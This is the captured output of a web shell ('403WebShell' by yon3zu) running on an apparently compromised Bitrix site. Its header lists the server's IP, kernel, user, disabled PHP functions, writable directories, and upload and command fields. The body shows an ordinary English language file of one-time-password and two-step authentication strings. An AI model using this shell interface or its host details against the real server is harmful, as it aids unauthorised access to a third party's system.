%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.22.66.140
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/security/lang/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/security/lang/en//options_user_settings.php
<?
$MESS ['security_TAB'] = "One-Time Password";
$MESS ['security_TAB_TITLE'] = "One-Time Password authentication settings";
$MESS["SEC_OTP_SECRET_KEY"] = "Secret Key (supplied with the device)";
$MESS["SEC_OTP_INIT"] = "Initialization";
$MESS["SEC_OTP_PASS1"] = "The first device password (click and write down)";
$MESS["SEC_OTP_PASS2"] = "The second device password (click again and write down)";
$MESS["SEC_OTP_TYPE"] = "Password generation algorithm";
$MESS["SEC_OTP_STATUS"] = "Current status";
$MESS["SEC_OTP_STATUS_ON"] = "Enabled";
$MESS["SEC_OTP_NEW_ACCESS_DENIED"] = "Access to two-step authentication control was denied.";
$MESS["SEC_OTP_NEW_SWITCH_ON"] = "Enable two-step authentication";
$MESS["SEC_OTP_DESCRIPTION_INTRO_TITLE"] = "One-time password";
$MESS["SEC_OTP_DESCRIPTION_INTRO_SITE"] = "Today, a user is using a pair of login and password to authenticate on your site. However, there are tools a malicious person
can employ to get into a computer and steal these data, for example if a user saves their password.<br>
<b>Two-step authentication</b> is the recommended option to protect against hacker software. Every time a user logs in to the system, they will have to pass two levels of verification. First, enter the login and password. Then, enter a one-time security code sent to their mobile device. The bottom line is an attacker cannot make use of the stolen data because they don't know the security code.";
$MESS["SEC_OTP_DESCRIPTION_INTRO_INTRANET"] = "Today, a user is using a pair of login and password to authenticate on your Bitrix24. However, there are tools a malicious person
can employ to get into a computer and steal these data, for example if a user saves their password.<br>
<b>Two-step authentication</b> is the recommended option to protect your Bitrix24 against hacker software. Every time a user logs in to the system, they will have to pass two levels of verification. First, enter the login and password. Then, enter a one-time security code sent to their mobile device. The bottom line is an attacker cannot make use of the stolen data because they don't know the security code.";
$MESS["SEC_OTP_DESCRIPTION_USING_TITLE"] = "Using One Time Passwords";
$MESS["SEC_OTP_DESCRIPTION_USING_STEP_0"] = "Step 1";
$MESS["SEC_OTP_DESCRIPTION_USING_STEP_1"] = "Step 2";
$MESS["SEC_OTP_DESCRIPTION_USING"] = "When two-step authentication is enabled, a user will have to pass two levels of verification when logging on. <br>
First, enter their e-mail and password as usual. <br>
Then, enter a one-time security code sent to their mobile device or obtained using a dedicated dongle.";
$MESS["SEC_OTP_DESCRIPTION_ACTIVATION_TITLE"] = "Activation";
$MESS["SEC_OTP_DESCRIPTION_ACTIVATION"] = "A one-time code for two-step authentication can be obtained by using a special device (a dongle), or a free mobile application (Bitrix OTP) each user needs to have installed on their mobile devices.<br>
To enable a dongle, the administrator will have to open the user's profile and enter the two passwords generated by the.<br>
To get a one-time code on a mobile device, a user can download and run the app, and scan the QR code on the settings page in their user profile or enter the account data manually.";
$MESS["SEC_OTP_DESCRIPTION_ABOUT_TITLE"] = "Description";
$MESS["SEC_OTP_DESCRIPTION_ABOUT"] = "One-Time Password (OTP) was developed as part of the OATH initiative.<br>
OTP is based on HMAC and SHA-1/SHA-256/SHA-512. At present, the two algorithms are supported to generate codes:
<ul><li>counter based(HMAC-Based One-time Password, HOTP) as described in <a href=\"https://tools.ietf.org/html/rfc4226\" target=\"_blank\">RFC4226</a></li>
<li>time based (Time-based One-time Password, TOTP) as described in <a href=\"https://tools.ietf.org/html/rfc6238\" target=\"_blank\">RFC6238</a></li></ul>
To calculate the OTP value the algorithm takes two input parameters: a secret key (initial value) and a current counter value (the number of required cycles of generation or a current time depending on the algorithm). The initial value is saved in the device as well as on the website once a device has been initialized. If using HOTP, the device counter is incremented on every OTP generation, while the server counter is changed on every successful OTP authentication. If using TOTP, no counter is saved in the device, and the server keeps track of the possible time change of the device on every successful OTP authentication.<br>
Each of the OTP devices in a batch includes an encrypted file containing the initial values (secret keys) for each device in the batch, the file is bound to the device serial number that can be found on the device.<br>
If the device and server counters grow out of sync, they can be easily synchronized back by bringing the server value to that of the device. To do so, the administrator (or a user with appropriate permission) has to generate two consecutive OTP's and enter them on the website.<br>
You can find the mobile app on AppStore and GooglePlay.";
$MESS["SEC_OTP_CONNECT_MOBILE_TITLE"] = "Connect mobile device";
$MESS["SEC_OTP_CONNECT_MOBILE_STEP_1"] = "Download the Bitrix OTP mobile app for your phone on <a href=\"https://itunes.apple.com/en/app/bitrix24-otp/id929604673?l=en\" target=\"_new\">AppStore</a> on <a href=\"https://play.google.com/store/apps/details?id=com.bitrixsoft.otp\" target=\"_new\">GooglePlay</a>";
$MESS["SEC_OTP_CONNECT_MOBILE_STEP_2"] = "Run the application and click <b>Configure</b>";
$MESS["SEC_OTP_CONNECT_MOBILE_STEP_3"] = "Choose how you want to enter data: using QR code or manually";
$MESS["SEC_OTP_CONNECT_MOBILE_SCAN_QR"] = "Bring your mobile device to the monitor and wait while the application is scanning the code.";
$MESS["SEC_OTP_CONNECT_MOBILE_MANUAL_INPUT"] = "To enter data manually, specify the website address, your e-mail or login, a secret code on the picture and select the key type.";
$MESS["SEC_OTP_CONNECT_MOBILE_MANUAL_INPUT_HOTP"] = "counter based";
$MESS["SEC_OTP_CONNECT_MOBILE_MANUAL_INPUT_TOTP"] = "time based";
$MESS["SEC_OTP_CONNECT_MOBILE_INPUT_DESCRIPTION"] = "Once the code has been successfully scanned or entered manually, your mobile phone will show the code you will have to enter below.";
$MESS["SEC_OTP_CONNECT_MOBILE_ENTER_CODE"] = "Enter code";
$MESS["SEC_OTP_CONNECT_MOBILE_INPUT_NEXT_DESCRIPTION"] = "The OTP algorithm requires two codes for authentication. Please generate the next code and enter it below.";
$MESS["SEC_OTP_CONNECT_MOBILE_ENTER_NEXT_CODE"] = "Enter next code";
$MESS["SEC_OTP_CONNECT_DONE"] = "Ready";
$MESS["SEC_OTP_CONNECT_DEVICE_TITLE"] = "Connect dongle";
$MESS["SEC_OTP_CONNECTED"] = "Connected";
$MESS["SEC_OTP_ENABLE"] = "Enable";
$MESS["SEC_OTP_DISABLE"] = "Disable";
$MESS["SEC_OTP_SYNC_NOW"] = "Synchronize";
$MESS["SEC_OTP_MOBILE_INPUT_METHODS_SEPARATOR"] = "or";
$MESS["SEC_OTP_MOBILE_SCAN_QR"] = "Scan QR code";
$MESS["SEC_OTP_MOBILE_MANUAL_INPUT"] = "Enter code manually";
$MESS["SEC_OTP_CONNECT_DEVICE"] = "Connect dongle";
$MESS["SEC_OTP_CONNECT_MOBILE"] = "Connect mobile device";
$MESS["SEC_OTP_CONNECT_NEW_DEVICE"] = "Connect new dongle";
$MESS["SEC_OTP_CONNECT_NEW_MOBILE"] = "Connect new mobile device";
$MESS["SEC_OTP_ERROR_TITLE"] = "Cannot save because an error occurred.";
$MESS["SEC_OTP_UNKNOWN_ERROR"] = "Unexpected error. Please try again later.";
$MESS["SEC_OTP_RECOVERY_CODES_BUTTON"] = "Recovery codes";
$MESS["SEC_OTP_RECOVERY_CODES_TITLE"] = "Recovery codes";
$MESS["SEC_OTP_RECOVERY_CODES_DESCRIPTION"] = "Copy the recovery codes you may need if you lost your mobile device or cannot get a code via the app for any other reason.";
$MESS["SEC_OTP_RECOVERY_CODES_WARNING"] = "Keep them handy, say in your wallet or purse. Each of the codes can only be used once.";
$MESS["SEC_OTP_RECOVERY_CODES_PRINT"] = "Print";
$MESS["SEC_OTP_RECOVERY_CODES_SAVE_FILE"] = "Save to text file";
$MESS["SEC_OTP_RECOVERY_CODES_REGENERATE_DESCRIPTION"] = "Short on recovery codes?<br/>
Create some new ones. <br/><br/>
Creating new recovery codes invalidates <br/>the previously generated codes.";
$MESS["SEC_OTP_RECOVERY_CODES_REGENERATE"] = "Generate new codes";
$MESS["SEC_OTP_RECOVERY_CODES_NOTE"] = "A code can only be used once. Hint: strike used codes off the list.";
$MESS["SEC_OTP_WARNING_RECOVERY_CODES"] = "Two-step authentication is enabled but you didn't create recovery codes. You may need them if you lost your mobile device or cannot get a code via the app for any other reason.";
$MESS["SEC_OTP_NO_DAYS"] = "forever";
$MESS["SEC_OTP_DEACTIVATE_UNTIL"] = "Disabled until #DATE#";
$MESS["SEC_OTP_MANDATORY_EXPIRED"] = "The time during which a user had to set up two-step authentication has now expired.";
$MESS["SEC_OTP_MANDATORY_ALMOST_EXPIRED"] = "The time during which a user has to set up two-step authentication will expire on #DATE#.";
$MESS["SEC_OTP_MANDATORY_DISABLED"] = "Mandatory two-step authentication disabled.";
$MESS["SEC_OTP_MANDATORY_ENABLE_DEFAULT"] = "Require the activation of two-step authentication";
$MESS["SEC_OTP_MANDATORY_ENABLE"] = "Require the activation of two-step authentication within";
$MESS["SEC_OTP_MANDATORY_DEFFER"] = "Extend";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit